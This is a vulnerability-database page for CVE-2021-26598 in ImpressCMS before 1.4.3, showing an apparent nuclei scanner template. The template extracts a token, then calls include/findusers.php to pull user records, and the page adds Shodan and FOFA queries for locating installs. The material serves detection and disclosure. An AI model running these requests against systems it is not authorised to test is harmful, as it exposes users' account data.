Lucene search
K

ImpressCMS <1.4.3 - Incorrect Authorization

šŸ—“ļøĀ 08 Jul 2026Ā 05:22:06Reported byĀ ProjectDiscoveryTypeĀ 
nuclei
Ā nuclei
šŸ”—Ā github.comšŸ‘Ā 30Ā Views

ImpressCMS <1.4.3 - Incorrect Authorization. Vulnerability allows unauthorized access and actions. Upgrade to version 1.4.3

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today
ImpressCMS 1.4.2 Incorrect Access Control Vulnerability
23 Mar 202200:00
–zdt
0day.today
ImpressCMS 1.4.2 - Remote Code Execution Exploit
30 Mar 202200:00
–zdt
Circl
CVE-2021-26598
28 Mar 202207:39
–circl
CNNVD
ImpressCMS ęŽˆęƒé—®é¢˜ę¼ę“ž
22 Mar 202200:00
–cnnvd
CNVD
ImpressCMS Access Control Error Vulnerability
24 Mar 202200:00
–cnvd
CVE
CVE-2021-26598
28 Mar 202200:31
–cve
Cvelist
CVE-2021-26598
28 Mar 202200:31
–cvelist
Exploit DB
ImpressCMS 1.4.2 - Remote Code Execution (RCE)
30 Mar 202200:00
–exploitdb
Github Security Blog
Incorrect Access Control in ImpressCMS
29 Mar 202200:01
–github
NVD
CVE-2021-26598
28 Mar 202201:15
–nvd
Rows per page
id: CVE-2021-26598

info:
  name: ImpressCMS <1.4.3 - Incorrect Authorization
  author: gy741,pdteam
  severity: medium
  description: ImpressCMS before 1.4.3 is susceptible to incorrect authorization via include/findusers.php. An attacker can provide a security token and potentially obtain sensitive information, modify data, and/or execute unauthorized operations.
  impact: |
    An attacker can bypass authorization and gain unauthorized access to sensitive information or perform unauthorized actions.
  remediation: |
    Upgrade to ImpressCMS version 1.4.3 or later to fix the vulnerability.
  reference:
    - https://hackerone.com/reports/1081137
    - http://karmainsecurity.com/KIS-2022-03
    - https://github.com/ImpressCMS
    - https://nvd.nist.gov/vuln/detail/CVE-2021-26598
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2021-26598
    cwe-id: CWE-287
    epss-score: 0.10813
    epss-percentile: 0.95312
    cpe: cpe:2.3:a:impresscms:impresscms:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: impresscms
    product: impresscms
    shodan-query:
      - http.html:"ImpressCMS"
      - cpe:"cpe:2.3:a:impresscms:impresscms"
      - http.html:"impresscms"
    fofa-query: body="impresscms"
  tags: cve,cve2021,hackerone,impresscms,unauth,cms,vuln

http:
  - raw:
      - |
        GET /misc.php?action=showpopups&type=friend HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36
      - |
        GET /include/findusers.php?token={{token}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - 'last_login'
          - 'user_regdate'
          - 'uname'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: token
        group: 1
        regex:
          - "REQUEST' value='(.*?)'"
          - 'REQUEST" value="(.*?)"'
        internal: true
# digest: 4a0a00473045022004a219212656e3ac7decd99bdddb2987efc53581dc0a7c938ddcf18410cf97b6022100dc38ea39c9d48bc7348026686a9dc278da6af2e46b077334d80d334f2ebcb158:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation withĀ Vulners data

WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data

Api

Power your application withĀ Vulners API

The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access

App

Assess and manage vulnerabilities withĀ VulnersĀ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 25
CVSS 3.15.3
EPSS0.10813
30